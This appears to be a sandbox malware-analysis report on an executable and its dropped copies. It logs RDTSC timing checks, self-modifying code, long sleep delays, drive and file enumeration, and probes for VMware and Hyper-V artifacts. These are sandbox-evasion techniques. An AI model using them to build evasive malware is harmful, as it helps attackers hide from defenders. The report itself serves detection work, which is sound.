Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1AC4 second address: 59A1ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1ACA second address: 59A1952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a jmp 00007FF2E55A2C30h 0x0000000f retn 0004h 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 call ebx 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF2E55A2C35h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940687 second address: 5940696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940696 second address: 594069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594069C second address: 59406BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF2E5514DF3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59406BA second address: 5940735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C2Fh 0x00000009 xor ah, 0000002Eh 0x0000000c jmp 00007FF2E55A2C39h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FF2E55A2C30h 0x00000018 and cl, FFFFFFA8h 0x0000001b jmp 00007FF2E55A2C2Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007FF2E55A2C36h 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov di, 0520h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940735 second address: 5940739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940739 second address: 594073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C002F second address: 59C0035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0035 second address: 59C003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C003B second address: 59C003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C003F second address: 59C004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C004E second address: 59C0052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0052 second address: 59C0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0056 second address: 59C005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C005C second address: 59C0075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C35h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0075 second address: 59C009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2E5514DEDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C009D second address: 59C00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FF2E55A2C2Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FF2E55A2C30h 0x00000019 call 00007FF2E55A2C29h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edi, 1F141A80h 0x00000026 mov esi, edi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C00EA second address: 59C00EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C00EF second address: 59C0112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59C0112 second address: 59C01A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push edi 0x00000011 movzx ecx, dx 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 mov ebx, 3A921896h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 mov al, 31h 0x00000026 pushfd 0x00000027 jmp 00007FF2E5514DEBh 0x0000002c or cx, 051Eh 0x00000031 jmp 00007FF2E5514DF9h 0x00000036 popfd 0x00000037 popad 0x00000038 pop eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FF2E5514DF3h 0x00000042 jmp 00007FF2E5514DF3h 0x00000047 popfd 0x00000048 jmp 00007FF2E5514DF8h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 597081A second address: 5970820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970820 second address: 5970824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970824 second address: 5970853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF2E55A2C2Dh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, A69Eh 0x00000016 call 00007FF2E55A2C2Fh 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970853 second address: 597087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1046808Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF2E5514DEAh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF2E5514DEDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 597087B second address: 5970881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970881 second address: 5970898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970898 second address: 59708B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59708B5 second address: 59708BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59708BB second address: 59708BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59708BF second address: 59708C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe Special instruction interceptor: First address: FCDA5D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hunta[1].exe Special instruction interceptor: First address: 116EA53 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hunta[1].exe Special instruction interceptor: First address: 11F6B5C instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 44DA5D instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 5EEA53 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 676B5C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 3BDA5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 55EA53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 5E6B5C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_059B056A rdtsc 2_2_059B056A
Source: C:\Users\user\Desktop\hunta[1].exe Window / User API: threadDelayed 1037
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1232
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1134
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 777
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1223
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1103
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 710
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1226
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1247
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 558
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1432
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 570
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1021
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1047
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1008
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1013
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 927
Source: C:\Users\user\Desktop\hunta[1].exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7636 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7612 Thread sleep count: 1037 > 30
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7612 Thread sleep time: -2075037s >= -30000s
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7420 Thread sleep count: 122 > 30
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7420 Thread sleep count: 216 > 30
Source: C:\Users\user\Desktop\hunta[1].exe TID: 8100 Thread sleep count: 230 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1732 Thread sleep count: 101 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1732 Thread sleep time: -202101s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6944 Thread sleep count: 110 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6944 Thread sleep time: -220110s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7860 Thread sleep time: -32000s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8108 Thread sleep count: 1232 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8108 Thread sleep time: -124432s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008 Thread sleep count: 1134 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008 Thread sleep count: 777 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008 Thread sleep time: -77700s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6956 Thread sleep count: 115 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6956 Thread sleep time: -230115s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8176 Thread sleep count: 121 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8176 Thread sleep time: -242121s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8180 Thread sleep count: 118 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8180 Thread sleep time: -236118s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2088 Thread sleep count: 86 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2088 Thread sleep time: -172086s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1824 Thread sleep count: 128 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1824 Thread sleep time: -256128s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7176 Thread sleep count: 138 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7176 Thread sleep time: -276138s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8128 Thread sleep count: 1223 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8128 Thread sleep time: -123523s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708 Thread sleep count: 1103 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708 Thread sleep count: 710 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708 Thread sleep time: -71000s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6220 Thread sleep count: 123 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6220 Thread sleep time: -246123s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7236 Thread sleep count: 129 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7236 Thread sleep time: -258129s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1560 Thread sleep count: 1226 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1560 Thread sleep time: -2453226s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3688 Thread sleep count: 1247 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3688 Thread sleep time: -2495247s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6876 Thread sleep count: 126 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1200 Thread sleep count: 558 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1200 Thread sleep time: -1116558s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6876 Thread sleep count: 260 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 4948 Thread sleep count: 1432 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 4948 Thread sleep time: -2865432s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2288 Thread sleep count: 253 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1696 Thread sleep count: 570 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1696 Thread sleep time: -1140570s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2800 Thread sleep count: 1021 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2800 Thread sleep time: -2043021s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2732 Thread sleep count: 1047 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2732 Thread sleep time: -2095047s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2312 Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2788 Thread sleep count: 1008 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2788 Thread sleep time: -2017008s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2312 Thread sleep count: 281 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6996 Thread sleep count: 229 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3092 Thread sleep count: 1013 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3092 Thread sleep time: -2027013s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3136 Thread sleep count: 927 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3136 Thread sleep time: -1854927s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00211718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00211754h 4_2_00211718
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B51718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00B51754h 22_2_00B51718
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_002129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 4_2_002129E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B529E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 22_2_00B529E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00212B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 4_2_00212B8C
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.:^G
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000002.1418971368.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000ok\AppData\Local\Temp\heidig8C
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
